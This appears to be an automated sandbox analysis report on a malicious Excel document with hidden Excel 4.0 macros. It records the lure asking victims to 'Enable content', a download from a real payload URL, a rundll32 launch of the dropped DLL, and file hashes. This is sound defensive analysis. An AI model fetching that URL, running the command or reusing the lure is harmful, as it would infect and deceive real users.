Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Heur.4923.xls

Overview

General Information

Sample Name:SecuriteInfo.com.Heur.4923.xls
Analysis ID:382906
MD5:e56e32e50718813c2a9428de1d3ba674
SHA1:90cfd7975eadf45a34361e1a1def62ab1d81cad1
SHA256:56af77e2f4b36f94264cbb975bbea753fa5a4b2bec98a4fe8235d5ec28543fcb
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 2992 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 2152 cmdline: rundll32 ..\sdbybsd.fds,StartW MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • wermgr.exe (PID: 2160 cmdline: C:\Windows\system32\wermgr.exe MD5: FF214585BF10206E21EA8EBA202FACFD)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Heur.4923.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x12ebb:$e1: Enable Editing
  • 0x12c05:$e3: Enable editing
  • 0x12cd7:$e4: Enable content

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: http://revolet-sa.com/files/countryyelow.phpVirustotal: Detection: 9%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: SecuriteInfo.com.Heur.4923.xlsVirustotal: Detection: 8%Perma Link
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: Binary string: K:\PrintMyMschartLegends_src\Source Code\PrintMyMschartLegends\Release\PrintMyMschartLegends.pdb source: sdbybsd.fds.0.dr

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: BDKsV[1].fbx.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: global trafficDNS query: name: revolet-sa.com
Source: global trafficTCP traffic: 192.168.2.3:49712 -> 192.232.249.186:80
Source: global trafficTCP traffic: 192.168.2.3:49712 -> 192.232.249.186:80
Source: global trafficHTTP traffic detected: GET /files/countryyelow.php HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: revolet-sa.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /files/countryyelow.php HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: revolet-sa.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: revolet-sa.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://api.aadrm.com/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://api.cortana.ai
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://api.office.net
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://api.onedrive.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://augloop.office.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://cdn.entity.
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://clients.config.office.net/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://config.edge.skype.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://cortana.ai
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://cortana.ai/api
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://cr.office.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://dev.cortana.ai
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://devnull.onenote.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://directory.services.
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://graph.windows.net
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://graph.windows.net/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://lifecycle.office.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://login.windows.local
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://management.azure.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://management.azure.com/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://messaging.office.com/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://ncus.contentsync.
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://officeapps.live.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://onedrive.live.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://outlook.office.com/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://outlook.office365.com/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://settings.outlook.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://staging.cortana.ai
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://tasks.office.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://wus2.contentsync.
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 8Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. tSi Protected View Thi
Source: Screenshot number: 8Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: SecuriteInfo.com.Heur.4923.xlsInitial sample: EXEC
Source: SecuriteInfo.com.Heur.4923.xlsInitial sample: CALL
Office process drops PE fileShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BDKsV[1].fbxJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: SecuriteInfo.com.Heur.4923.xlsOLE indicator, VBA macros: true
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BDKsV[1].fbx AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
Source: Joe Sandbox ViewDropped File: C:\Users\user\sdbybsd.fds AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
Source: SecuriteInfo.com.Heur.4923.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: classification engineClassification label: mal92.expl.evad.winXLS@5/9@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{AF536EC5-BD92-4268-9CAC-FB21F1B68AC5} - OProcSessId.datJump to behavior
Source: SecuriteInfo.com.Heur.4923.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: SecuriteInfo.com.Heur.4923.xlsVirustotal: Detection: 8%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartWJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exeJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: Binary string: K:\PrintMyMschartLegends_src\Source Code\PrintMyMschartLegends\Release\PrintMyMschartLegends.pdb source: sdbybsd.fds.0.dr
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_042E1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,2_2_042E1030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04890E20 push dword ptr [edx+14h]; ret 2_2_04890F2D
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BDKsV[1].fbxJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BDKsV[1].fbxJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
